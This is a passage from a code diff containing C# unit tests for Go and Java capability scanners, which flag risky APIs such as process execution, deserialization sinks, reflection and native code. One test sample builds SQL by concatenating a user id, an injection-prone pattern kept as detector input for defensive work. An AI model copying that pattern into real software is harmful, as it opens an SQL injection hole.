const string code = @"os.Chmod(""file.txt"", 0755)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Chmod/Chown", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsChown()
{
const string code = @"os.Chown(""file.txt"", 1000, 1000)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Chmod/Chown", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsOsSymlink()
{
const string code = @"os.Symlink(""target"", ""link"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Symlink/Link", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsMkdir()
{
const string code = @"os.Mkdir(""dir"", 0755)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.Mkdir", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsReadFile()
{
const string code = @"data, _ := os.ReadFile(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("os.ReadFile/WriteFile", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsIoutilReadFile()
{
const string code = @"data, _ := ioutil.ReadFile(""file.txt"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("ioutil", result[0].Pattern);
}
#endregion
#region ScanFile - Network Patterns
[Fact]
public void ScanFile_DetectsNetDial()
{
const string code = @"conn, _ := net.Dial(""tcp"", ""localhost:8080"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("net.Dial", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNetListen()
{
const string code = @"ln, _ := net.Listen(""tcp"", "":8080"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("net.Listen", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsHttpGet()
{
const string code = @"resp, _ := http.Get(""https://example.com"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("http.Get/Post", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsHttpPost()
{
const string code = @"resp, _ := http.Post(""https://example.com"", ""application/json"", body)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("http.Get/Post", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsHttpListenAndServe()
{
const string code = @"http.ListenAndServe("":8080"", nil)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("http.ListenAndServe", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsNetLookupHost()
{
const string code = @"addrs, _ := net.LookupHost(""example.com"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("net.Lookup", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
#endregion
#region ScanFile - Environment Patterns
[Fact]
public void ScanFile_DetectsOsGetenv()
{
const string code = @"val := os.Getenv(""PATH"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("os.Getenv", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsLookupEnv()
{
const string code = @"val, ok := os.LookupEnv(""PATH"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("os.Getenv", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsOsSetenv()
{
const string code = @"os.Setenv(""MY_VAR"", ""value"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("os.Setenv", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOsEnviron()
{
const string code = @"env := os.Environ()";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("os.Environ", result[0].Pattern);
}
#endregion
#region ScanFile - Serialization Patterns
[Fact]
public void ScanFile_DetectsGobDecoder()
{
const string code = @"dec := gob.NewDecoder(reader)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("gob.Decoder/Encoder", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJsonUnmarshal()
{
const string code = @"json.Unmarshal(data, &obj)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("json", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsXmlUnmarshal()
{
const string code = @"xml.Unmarshal(data, &obj)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("xml.Unmarshal", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsYamlUnmarshal()
{
const string code = @"yaml.Unmarshal(data, &obj)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("yaml.Unmarshal", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
#endregion
#region ScanFile - Crypto Patterns
[Fact]
public void ScanFile_DetectsSha256New()
{
const string code = @"h := sha256.New()";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("crypto/hash", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsAesNewCipher()
{
const string code = @"block, _ := aes.NewCipher(key)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("crypto/cipher", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsRsaGenerateKey()
{
const string code = @"key, _ := rsa.GenerateKey(rand.Reader, 2048)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("crypto/rsa", result[0].Pattern);
}
#endregion
#region ScanFile - Database Patterns
[Fact]
public void ScanFile_DetectsSqlOpen()
{
const string code = @"db, _ := sql.Open(""postgres"", connStr)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("sql.Open", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
#endregion
#region ScanFile - Dynamic Code Patterns
[Fact]
public void ScanFile_DetectsReflectValueCall()
{
const string code = @"
import ""reflect""
v.Call(args)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("reflect.Value.Call", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsMethodByName()
{
const string code = @"m := v.MethodByName(""Execute"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("reflect.MethodByName", result[0].Pattern);
}
#endregion
#region ScanFile - Reflection Patterns
[Fact]
public void ScanFile_DetectsReflectTypeOf()
{
const string code = @"t := reflect.TypeOf(obj)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("reflect.TypeOf/ValueOf", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsReflectNew()
{
const string code = @"v := reflect.New(t)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("reflect.New", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRuntimeCaller()
{
const string code = @"_, file, line, _ := runtime.Caller(0)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("runtime.Caller", result[0].Pattern);
}
#endregion
#region ScanFile - Native Code Patterns
[Fact]
public void ScanFile_DetectsCgoImport()
{
const string code = @"import ""C""";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Contains("C", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsUnsafePointer()
{
const string code = @"ptr := unsafe.Pointer(&x)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("unsafe.Pointer", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsGoLinknameDirective()
{
const string code = @"//go:linkname localName runtime.someInternalFunc";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("go:linkname", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsGoNoescapeDirective()
{
const string code = @"//go:noescape
func unsafeFunc(ptr *byte)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("go:noescape", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSyscallSyscall()
{
const string code = @"r1, r2, err := syscall.Syscall(SYS_WRITE, fd, buf, count)";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
Assert.Equal("syscall.Syscall", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Plugin Patterns
[Fact]
public void ScanFile_DetectsPluginOpen()
{
const string code = @"p, _ := plugin.Open(""plugin.so"")";
var result = GoCapabilityScanner.ScanFile(code, TestFile);
Assert.Single(result);
Assert.Equal(CapabilityKind.PluginLoading, result[0].Kind);
Assert.Equal("plugin.Open", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region GoCapabilityEvidence Tests
[Fact]
public void Evidence_DeduplicationKey_IsCorrect()
{
var evidence = new GoCapabilityEvidence(
CapabilityKind.Exec,
"test.go",
10,
"exec.Command");
Assert.Equal("Exec|test.go|10|exec.Command", evidence.DeduplicationKey);
}
[Fact]
public void Evidence_ConfidenceIsClamped()
{
var evidence1 = new GoCapabilityEvidence(
CapabilityKind.Exec, "test.go", 1, "pattern",
confidence: 2.0f);
var evidence2 = new GoCapabilityEvidence(
CapabilityKind.Exec, "test.go", 1, "pattern",
confidence: -1.0f);
Assert.Equal(1.0f, evidence1.Confidence);
Assert.Equal(0.0f, evidence2.Confidence);
}
[Fact]
public void Evidence_CreateMetadata_IncludesAllFields()
{
var evidence = new GoCapabilityEvidence(
CapabilityKind.Exec,
"test.go",
10,
"exec.Command",
snippet: "cmd := exec.Command(\"ls\")",
confidence: 0.95f,
risk: CapabilityRisk.Critical);
var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
Assert.Equal("exec", metadata["capability.kind"]);
Assert.Equal("test.go:10", metadata["capability.source"]);
Assert.Equal("exec.Command", metadata["capability.pattern"]);
Assert.Equal("critical", metadata["capability.risk"]);
Assert.Equal("0.95", metadata["capability.confidence"]);
Assert.Contains("exec.Command", metadata["capability.snippet"]);
}
[Fact]
public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
{
var evidence = new GoCapabilityEvidence(
CapabilityKind.Exec,
"test.go",
10,
"exec.Command");
var langEvidence = evidence.ToLanguageEvidence();
Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
Assert.Equal("test.go", langEvidence.Source);
Assert.Equal("line:10", langEvidence.Locator);
Assert.Equal("Exec:exec.Command", langEvidence.Value);
}
#endregion
}

786
src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Java.Tests/Internal/JavaCapabilityScannerTests.cs Normal file
View File

@@ -0,0 +1,786 @@
using StellaOps.Scanner.Analyzers.Lang.Java.Internal.Capabilities;
namespace StellaOps.Scanner.Analyzers.Lang.Java.Tests.Internal;
/// <summary>
/// Tests for <see cref="JavaCapabilityScanner"/>.
/// </summary>
public sealed class JavaCapabilityScannerTests
{
private const string TestFile = "Test.java";
#region ScanFile - General Tests
[Fact]
public void ScanFile_NullContent_ReturnsEmpty()
{
var result = JavaCapabilityScanner.ScanFile(null!, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_EmptyContent_ReturnsEmpty()
{
var result = JavaCapabilityScanner.ScanFile("", TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_WhitespaceContent_ReturnsEmpty()
{
var result = JavaCapabilityScanner.ScanFile(" \n\t\n ", TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_NoPatterns_ReturnsEmpty()
{
const string code = @"
public class Test {
public static void main(String[] args) {
System.out.println(""Hello"");
}
}";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_NormalizesBackslashesInPath()
{
const string code = @"Runtime.getRuntime().exec(""cmd"");";
var result = JavaCapabilityScanner.ScanFile(code, @"C:\src\Test.java").ToList();
Assert.Single(result);
Assert.Equal("C:/src/Test.java", result[0].SourceFile);
}
#endregion
#region ScanFile - Comment Stripping
[Fact]
public void ScanFile_IgnoresSingleLineComments()
{
const string code = @"
// Runtime.getRuntime().exec(""cmd"");
public void method() { }";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresMultiLineComments()
{
const string code = @"
/*
Runtime.getRuntime().exec(""cmd"");
new ProcessBuilder(""ls"");
*/
public void method() { }";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
[Fact]
public void ScanFile_IgnoresJavadocComments()
{
const string code = @"
/**
* Runtime.getRuntime().exec(""cmd"");
*/
public void method() { }";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Empty(result);
}
#endregion
#region ScanFile - Exec Patterns
[Fact]
public void ScanFile_DetectsRuntimeExec()
{
const string code = @"Runtime.getRuntime().exec(""ls -la"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("Runtime.exec", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
Assert.Equal(1.0f, result[0].Confidence);
}
[Fact]
public void ScanFile_DetectsNewProcessBuilder()
{
const string code = @"ProcessBuilder pb = new ProcessBuilder(""ls"", ""-la"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("ProcessBuilder", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsProcessBuilderStart()
{
const string code = @"Process p = pb.start();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Exec, result[0].Kind);
Assert.Equal("ProcessBuilder.start", result[0].Pattern);
}
#endregion
#region ScanFile - Filesystem Patterns
[Fact]
public void ScanFile_DetectsFileInputStream()
{
const string code = @"InputStream is = new FileInputStream(""file.txt"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("FileInputStream", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFileOutputStream()
{
const string code = @"OutputStream os = new FileOutputStream(""file.txt"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("FileOutputStream", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFilesRead()
{
const string code = @"byte[] data = Files.readAllBytes(path);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("Files.*", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsFileDelete()
{
const string code = @"file.delete();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File.delete", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsFileSetExecutable()
{
const string code = @"file.setExecutable(true);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("File.setExecutable", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsRandomAccessFile()
{
const string code = @"RandomAccessFile raf = new RandomAccessFile(""file.bin"", ""rw"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
Assert.Equal("RandomAccessFile", result[0].Pattern);
}
#endregion
#region ScanFile - Network Patterns
[Fact]
public void ScanFile_DetectsNewSocket()
{
const string code = @"Socket socket = new Socket(""localhost"", 8080);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("Socket", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsNewServerSocket()
{
const string code = @"ServerSocket ss = new ServerSocket(8080);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("ServerSocket", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsUrlOpenConnection()
{
const string code = @"HttpURLConnection conn = (HttpURLConnection) url.openConnection();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.Network);
}
[Fact]
public void ScanFile_DetectsHttpClientBuilder()
{
const string code = @"HttpClient client = HttpClient.newBuilder().build();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Network, result[0].Kind);
Assert.Equal("HttpClient.newBuilder", result[0].Pattern);
}
#endregion
#region ScanFile - Environment Patterns
[Fact]
public void ScanFile_DetectsSystemGetenv()
{
const string code = @"String path = System.getenv(""PATH"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("System.getenv", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSystemGetProperty()
{
const string code = @"String home = System.getProperty(""user.home"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("System.getProperty", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSystemSetProperty()
{
const string code = @"System.setProperty(""my.prop"", ""value"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Environment, result[0].Kind);
Assert.Equal("System.setProperty", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Serialization Patterns (Critical for deserialization attacks)
[Fact]
public void ScanFile_DetectsObjectInputStream()
{
const string code = @"ObjectInputStream ois = new ObjectInputStream(fis);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("ObjectInputStream", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsReadObject()
{
const string code = @"Object obj = ois.readObject();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("readObject", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsXMLDecoder()
{
const string code = @"XMLDecoder decoder = new XMLDecoder(new FileInputStream(""data.xml""));";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Pattern == "XMLDecoder" && r.Risk == CapabilityRisk.Critical);
}
[Fact]
public void ScanFile_DetectsXStream()
{
const string code = @"XStream xstream = new XStream();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("XStream", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsXStreamFromXML()
{
const string code = @"Object obj = xstream.fromXML(xml);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("XStream.fromXML", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSnakeYamlLoad()
{
const string code = @"Object obj = yaml.load(input);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("Yaml.load", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJacksonEnableDefaultTyping()
{
const string code = @"mapper.enableDefaultTyping();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
Assert.Equal("Jackson defaultTyping", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Crypto Patterns
[Fact]
public void ScanFile_DetectsMessageDigest()
{
const string code = @"MessageDigest md = MessageDigest.getInstance(""SHA-256"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("MessageDigest", result[0].Pattern);
Assert.Equal(CapabilityRisk.Low, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsCipher()
{
const string code = @"Cipher cipher = Cipher.getInstance(""AES/CBC/PKCS5Padding"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
Assert.Equal("Cipher", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsWeakCryptoMD5()
{
const string code = @"MessageDigest md = MessageDigest.getInstance(""MD5"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Pattern == "Weak crypto algorithm" && r.Risk == CapabilityRisk.High);
}
#endregion
#region ScanFile - Database Patterns
[Fact]
public void ScanFile_DetectsDriverManagerGetConnection()
{
const string code = @"Connection conn = DriverManager.getConnection(url);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("DriverManager.getConnection", result[0].Pattern);
Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsExecuteQuery()
{
const string code = @"ResultSet rs = stmt.executeQuery(sql);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("Statement.executeQuery", result[0].Pattern);
}
[Fact]
public void ScanFile_DetectsSqlStringConcatenation()
{
const string code = @"String sql = ""SELECT * FROM users WHERE id="" + userId;";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Contains("SQL", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsCreateNativeQuery()
{
const string code = @"Query q = em.createNativeQuery(""SELECT * FROM users"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Database, result[0].Kind);
Assert.Equal("Native SQL query", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
#endregion
#region ScanFile - Dynamic Code Patterns
[Fact]
public void ScanFile_DetectsScriptEngineManager()
{
const string code = @"ScriptEngine engine = new ScriptEngineManager().getEngineByName(""javascript"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.True(result.Count >= 1);
Assert.Contains(result, r => r.Kind == CapabilityKind.DynamicCode);
}
[Fact]
public void ScanFile_DetectsScriptEngineEval()
{
const string code = @"Object result = engine.eval(script);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("ScriptEngine.eval", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSpelExpressionParser()
{
const string code = @"SpelExpressionParser parser = new SpelExpressionParser();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("SpEL Parser", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsOgnlGetValue()
{
const string code = @"Object value = Ognl.getValue(expression, context, root);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("OGNL.getValue", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsJavaCompiler()
{
const string code = @"JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
Assert.Equal("JavaCompiler", result[0].Pattern);
Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
}
#endregion
#region ScanFile - Reflection Patterns
[Fact]
public void ScanFile_DetectsClassForName()
{
const string code = @"Class<?> clazz = Class.forName(""com.example.MyClass"");";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Class.forName", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsMethodInvoke()
{
const string code = @"Object result = Method.invoke(obj, args);";
var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
Assert.Single(result);
Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
Assert.Equal("Method.invoke", result[0].Pattern);
Assert.Equal(CapabilityRisk.High, result[0].Risk);
}
[Fact]
public void ScanFile_DetectsSetAccessibleTrue()
{
